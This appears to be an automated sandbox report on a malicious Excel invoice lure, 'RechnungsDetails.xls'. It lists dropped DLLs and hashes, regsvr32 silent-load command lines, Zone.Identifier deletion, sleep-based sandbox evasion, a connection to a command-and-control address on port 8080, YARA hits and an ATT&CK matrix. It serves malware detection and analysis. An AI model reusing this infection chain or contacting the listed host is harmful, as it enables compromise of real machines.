                      Source: uxevr2.ocx.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\LjSKxP[1].dll 67C21491D013E6DBE6E123530F6686010163E75EF3DF41CEEBF7601C78692434
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\CPZby9k8xhW2TaPgwsAagxTpGuhIkFrK[1].dll 8975189B8CB95CA5DC8EDAE1AC48C816A065467355B5C8678C6D9C0323C8F13B
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\F3DOS06hLF1rUq3s6XOB[1].dll 38B418029CB9E717604336AC6B2AF141A8549EFA0B7DA970CBEE4E0FA199A056
                      Source: RechnungsDetails.xlsVirustotal: Detection: 42%
                      Source: RechnungsDetails.xlsReversingLabs: Detection: 36%
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocx
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\FIdWcB\GulPp.dll"
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocx
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocx
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AQbqR\xhDhNsFFy.dll"
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\IWNForDwCavadlTU\oACuhBcYqGjSrI.dll"
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocxJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocxJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocxJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocxJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\FIdWcB\GulPp.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\IWNForDwCavadlTU\oACuhBcYqGjSrI.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AQbqR\xhDhNsFFy.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr1.ocxJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR6759.tmpJump to behavior
                      Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@16/15@4/5
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: RechnungsDetails.xlsOLE indicator, Workbook stream: true
                      Source: RechnungsDetails.xls.0.drOLE indicator, Workbook stream: true
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180006F2C CloseHandle,Process32FirstW,CreateToolhelp32Snapshot,Process32NextW,4_2_0000000180006F2C
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: RechnungsDetails.xlsInitial sample: OLE indicators vbamacros = False
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000C892 push ebp; retf 3_2_000000018000C895
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000D095 push B3B8007Eh; iretd 3_2_000000018000D09A
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000D0F3 push ebp; iretd 3_2_000000018000D0F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180013551 push ebx; retf 3_2_0000000180013559
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000D15D push ebx; retn 0068h3_2_000000018000D15E
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000CDA8 push ebp; iretd 3_2_000000018000CDA9
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000CE36 push 458B0086h; iretd 3_2_000000018000CE3B
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180013551 push ebx; retf 4_2_0000000180013559
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000C892 push ebp; retf 5_2_000000018000C895
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000D095 push B3B8007Eh; iretd 5_2_000000018000D09A
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000D0F3 push ebp; iretd 5_2_000000018000D0F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180013551 push ebx; retf 5_2_0000000180013559
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000D15D push ebx; retn 0068h5_2_000000018000D15E
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000CDA8 push ebp; iretd 5_2_000000018000CDA9
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000CE36 push 458B0086h; iretd 5_2_000000018000CE3B
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000C892 push ebp; retf 9_2_000000018000C895
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000D095 push B3B8007Eh; iretd 9_2_000000018000D09A
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000D0F3 push ebp; iretd 9_2_000000018000D0F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180013551 push ebx; retf 9_2_0000000180013559
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000D15D push ebx; retn 0068h9_2_000000018000D15E
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000CDA8 push ebp; iretd 9_2_000000018000CDA9
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000CE36 push 458B0086h; iretd 9_2_000000018000CE3B
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180013551 push ebx; retf 10_2_0000000180013559
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D30CC0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,3_2_000007FEF9D30CC0
                      Source: uxevr1.ocx.0.drStatic PE information: real checksum: 0x654f5 should be: 0x5c267
                      Source: LjSKxP[1].dll.0.drStatic PE information: real checksum: 0x654f5 should be: 0x5d0fb
                      Source: uxevr2.ocx.0.drStatic PE information: real checksum: 0x0 should be: 0x667cb
                      Source: CPZby9k8xhW2TaPgwsAagxTpGuhIkFrK[1].dll.0.drStatic PE information: real checksum: 0x654f5 should be: 0x5c267
                      Source: F3DOS06hLF1rUq3s6XOB[1].dll.0.drStatic PE information: real checksum: 0x0 should be: 0x667cb
                      Source: uxevr4.ocx.0.drStatic PE information: real checksum: 0x654f5 should be: 0x5d0fb
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\FIdWcB\GulPp.dll"
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr1.ocxJump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\AQbqR\xhDhNsFFy.dll (copy)Jump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\CPZby9k8xhW2TaPgwsAagxTpGuhIkFrK[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\F3DOS06hLF1rUq3s6XOB[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\LjSKxP[1].dllJump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\IWNForDwCavadlTU\oACuhBcYqGjSrI.dll (copy)Jump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\FIdWcB\GulPp.dll (copy)Jump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr2.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr4.ocxJump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\AQbqR\xhDhNsFFy.dll (copy)Jump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\IWNForDwCavadlTU\oACuhBcYqGjSrI.dll (copy)Jump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\FIdWcB\GulPp.dll (copy)Jump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr1.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr2.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr4.ocxJump to dropped file

                      Boot Survival

                      barindex
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr1.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr2.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr4.ocxJump to dropped file

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\FIdWcB\GulPp.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\IWNForDwCavadlTU\oACuhBcYqGjSrI.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\AQbqR\xhDhNsFFy.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 2252Thread sleep time: -180000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 2844Thread sleep time: -300000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 412Thread sleep time: -180000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 956Thread sleep time: -120000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 2868Thread sleep time: -120000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_3-16410
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\CPZby9k8xhW2TaPgwsAagxTpGuhIkFrK[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\LjSKxP[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\F3DOS06hLF1rUq3s6XOB[1].dllJump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeAPI coverage: 8.2 %
                      Source: C:\Windows\System32\regsvr32.exeAPI coverage: 8.2 %
                      Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800248B0 FindFirstFileW,FindNextFileW,FindClose,4_2_00000001800248B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800248B0 FindFirstFileW,FindNextFileW,FindClose,10_2_00000001800248B0
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_3-16412
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_3-16517
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_5-14223
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: regsvr32.exe, 00000009.00000002.1055505564.000000000043A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D23280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_000007FEF9D23280
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D30215 _itow_s,_invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,_wcsftime_l,_invoke_watson_if_oneof,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_snwprintf_s,_invoke_watson_if_oneof,_invoke_watson_if_error,_invoke_watson_if_oneof,_invoke_watson_if_error,_unlock,GetFileType,WriteConsoleW,GetLastError,_invoke_watson_if_oneof,WriteFile,WriteFile,OutputDebugStringW,_itow_s,_invoke_watson_if_error,3_2_000007FEF9D30215
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D30CC0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,3_2_000007FEF9D30CC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D23280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_000007FEF9D23280
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D2BE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_000007FEF9D2BE50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF752F298 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_000007FEF752F298
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF7528670 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_000007FEF7528670
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000007FEF919BE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_000007FEF919BE50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000007FEF9193280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_000007FEF9193280

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 173.82.82.196 8080Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\FIdWcB\GulPp.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\IWNForDwCavadlTU\oACuhBcYqGjSrI.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AQbqR\xhDhNsFFy.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,free,5_2_000007FEF7534C0C
                      Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,GetLocaleInfoA,5_2_000007FEF753383C
                      Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,EnumSystemLocalesA,GetUserDefaultLCID,GetLocaleInfoW,GetLocaleInfoW,GetACP,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,_itow_s,5_2_000007FEF7533EB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesA,5_2_000007FEF7533E4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesA,5_2_000007FEF7533DB4
                      Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoW,5_2_000007FEF75339B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,GetLocaleInfoA,GetLocaleInfoW,5_2_000007FEF7533C84
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLastError,free,free,GetLocaleInfoW,GetLocaleInfoW,free,GetLocaleInfoW,5_2_000007FEF752F070
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,5_2_000007FEF7533924
                      Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D28900 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,3_2_000007FEF9D28900
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D28860 HeapCreate,GetVersion,HeapSetInformation,3_2_000007FEF9D28860

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 3.2.regsvr32.exe.2c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.regsvr32.exe.140000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.regsvr32.exe.3f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.regsvr32.exe.140000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.2c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.regsvr32.exe.140000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.regsvr32.exe.160000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.regsvr32.exe.160000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.regsvr32.exe.140000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.regsvr32.exe.3f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.1264915905.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.1264216924.00000000003F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1346182348.0000000000160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1056224873.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.926879685.00000000002C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1055136020.0000000000140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1347157002.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1346169156.0000000000140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1347032948.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts2
                      Scripting
                      Path Interception111
                      Process Injection
                      131
                      Masquerading
                      OS Credential Dumping1
                      System Time Discovery
                      Remote Services1
                      Archive Collected Data
                      Exfiltration Over Other Network Medium11
                      Encrypted Channel
                      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default Accounts2
                      Native API
                      Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                      Disable or Modify Tools
                      LSASS Memory1
                      Query Registry
                      Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
                      Non-Standard Port
                      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain Accounts43
                      Exploitation for Client Execution
                      Logon Script (Windows)Logon Script (Windows)1
                      Virtualization/Sandbox Evasion
                      Security Account Manager121
                      Security Software Discovery
                      SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration13
                      Ingress Tool Transfer
                      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
                      Process Injection
                      NTDS1
                      Virtualization/Sandbox Evasion
                      Distributed Component Object ModelInput CaptureScheduled Transfer2
                      Non-Application Layer Protocol
                      SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information
                      LSA Secrets2
                      Process Discovery
                      SSHKeyloggingData Transfer Size Limits23
                      Application Layer Protocol
                      Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common2
                      Scripting
                      Cached Domain Credentials1
                      Remote System Discovery
                      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                      Hidden Files and Directories
                      DCSync2
                      File and Directory Discovery
                      Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job2
                      Obfuscated Files or Information
                      Proc Filesystem26
                      System Information Discovery
                      Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                      Regsvr32
                      /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
